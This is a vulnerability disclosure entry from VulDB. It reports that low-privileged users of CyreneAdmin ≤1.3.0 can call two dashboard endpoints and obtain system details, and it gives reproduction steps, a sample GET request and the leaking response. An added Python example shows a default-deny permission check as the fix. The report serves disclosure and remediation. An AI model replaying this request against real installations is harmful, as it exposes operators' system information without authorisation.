Submission #754242: CoCoTeaNet CyreneAdmin ≤1.3.0 Broken Access Control Info

Title: CoCoTeaNet CyreneAdmin ≤1.3.0 Broken Access Control
Description:

**Title:** Broken Access Control on Dashboard System Info Endpoints

**BUG_Author:** sageee

**Affected Version:** CyreneAdmin (Current GitHub Head)

**Vendor:** CoCoTeaNet GitHub Repository

**Software:** CyreneAdmin

**Vulnerability Url:**

- /api/system/dashboard/getCount
- /api/system/dashboard/getSystemInfo

**Description:** The application fails to properly enforce role-based access control (RBAC) on sensitive system monitoring endpoints.

1. Under normal circumstances, unauthorized access to restricted administrative interfaces results in a specific error response: `{"code": 4002, "message": "无权限访问"}`.
2. However, a standard user (e.g., username `test`) with low privileges is able to bypass this check and successfully request `/api/system/dashboard/getCount` and `/api/system/dashboard/getSystemInfo`.
3. Instead of receiving the 4002 error, the server returns sensitive system environment data (OS, Java version) and business statistics, leading to Information Disclosure and Broken Access Control.

**Reproduction Steps:**

1. Log in to the application using a standard user account (e.g., `test`).
2. Obtain the valid authentication token (Authorization header) for this low-privileged user.
3. Send a GET request to the administrative endpoints.

**Vulnerability Request & Response Analysis:**

**Request:**

```http
GET /api/system/dashboard/getSystemInfo HTTP/1.1
Host: localhost:8080
Authorization: [Standard_User_Token]
User-Agent: Mozilla/5.0
```

**Vulnerable Response (Actual):** The server returns HTTP 200 with system details, bypassing the permission check.

```json
{
  "code": 200,
  "msg": "操作成功",
  "data": {
    "osName": "Windows 11",
    "osArch": "amd64",
    "javaVersion": "1.8.0_301",
    "userDir": "C:\\Users\\Admin\\CyreneAdmin",
    "cpuUsage": 15.5,
    "memUsage": 45.2
  }
}
```

**Contrast with Secure Behavior:** If the access control were working correctly, the server should have returned the following denial message (which it failed to do):

```json
{
  "code": 4002,
  "data": null,
  "message": "无权限访问",
  "time": "2026-02-08 20:39:58"
}
```
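The report's fix boils down to one thing: the permission check must run unconditionally on every administrative endpoint, and unmapped administrative paths should fail closed. The following is an added illustration of such a check, written for this page and not taken from CyreneAdmin's code base; the endpoint paths and the 200/4002 response shapes come from the report, while the permission name `system:dashboard:view`, the `ADMIN_PREFIX` default-deny rule, the `User` model and the `check_access`/`handle_request` functions are assumptions.

```python
"""Default-deny RBAC check for the dashboard endpoints named in the report.

Constructed example; the permission string and the User/check_access API are
assumed, not CyreneAdmin's own.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Callable, Optional

# Endpoint -> permission required to call it. Paths are from the report;
# the permission name is an assumed placeholder.
REQUIRED_PERMISSION = {
    "/api/system/dashboard/getCount": "system:dashboard:view",
    "/api/system/dashboard/getSystemInfo": "system:dashboard:view",
}

# Anything under this prefix is treated as administrative and is denied
# unless explicitly mapped above: fail closed, never fail open.
ADMIN_PREFIX = "/api/system/"


@dataclass(frozen=True)
class User:
    username: str
    permissions: frozenset = frozenset()


def deny_response(now: Optional[datetime] = None) -> dict:
    """The 4002 denial body the report says a correct check returns."""
    ts = (now or datetime.now()).strftime("%Y-%m-%d %H:%M:%S")
    return {"code": 4002, "data": None, "message": "无权限访问", "time": ts}


def check_access(user: User, path: str) -> Optional[dict]:
    """Return None if `user` may call `path`, otherwise the denial body.

    The reported bug is that this check was skipped for the two dashboard
    endpoints; here it runs for every request before any handler executes.
    """
    required = REQUIRED_PERMISSION.get(path)
    if required is None:
        # Unmapped administrative path: deny rather than assume it is public.
        return deny_response() if path.startswith(ADMIN_PREFIX) else None
    if required not in user.permissions:
        return deny_response()
    return None


def handle_request(user: User, path: str, handler: Callable[[], dict]) -> dict:
    """Dispatch to `handler` only after the access check passes."""
    denial = check_access(user, path)
    if denial is not None:
        return denial
    return {"code": 200, "msg": "操作成功", "data": handler()}


def get_system_info() -> dict:
    # Constructed stand-in for the real handler; values mirror the report.
    return {"osName": "Windows 11", "osArch": "amd64", "javaVersion": "1.8.0_301"}


def get_count() -> dict:
    # Constructed sample business statistic.
    return {"userCount": 3}


if __name__ == "__main__":
    test_user = User("test")  # low-privileged user from the report, no permissions
    admin = User("admin", frozenset({"system:dashboard:view"}))
    print(handle_request(test_user, "/api/system/dashboard/getSystemInfo", get_system_info))
    print(handle_request(admin, "/api/system/dashboard/getSystemInfo", get_system_info))
```

Running the module shows the `test` user receiving the 4002 body for both endpoints while the admin receives the 200 payload; the prefix rule also denies any `/api/system/...` path that nobody remembered to register, which is the class of omission that produced this finding.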
User: sageee (UID 82251)
Submitted: 2026-02-08 14:12 (4 months ago)
Moderation: 2026-02-18 15:20 (10 days later)
Status: Accepted
VulDB Entry: 346493 [CoCoTeaNet CyreneAdmin up to 1.3.0 System Info Endpoint getCount privilege escalation]
Points: 17
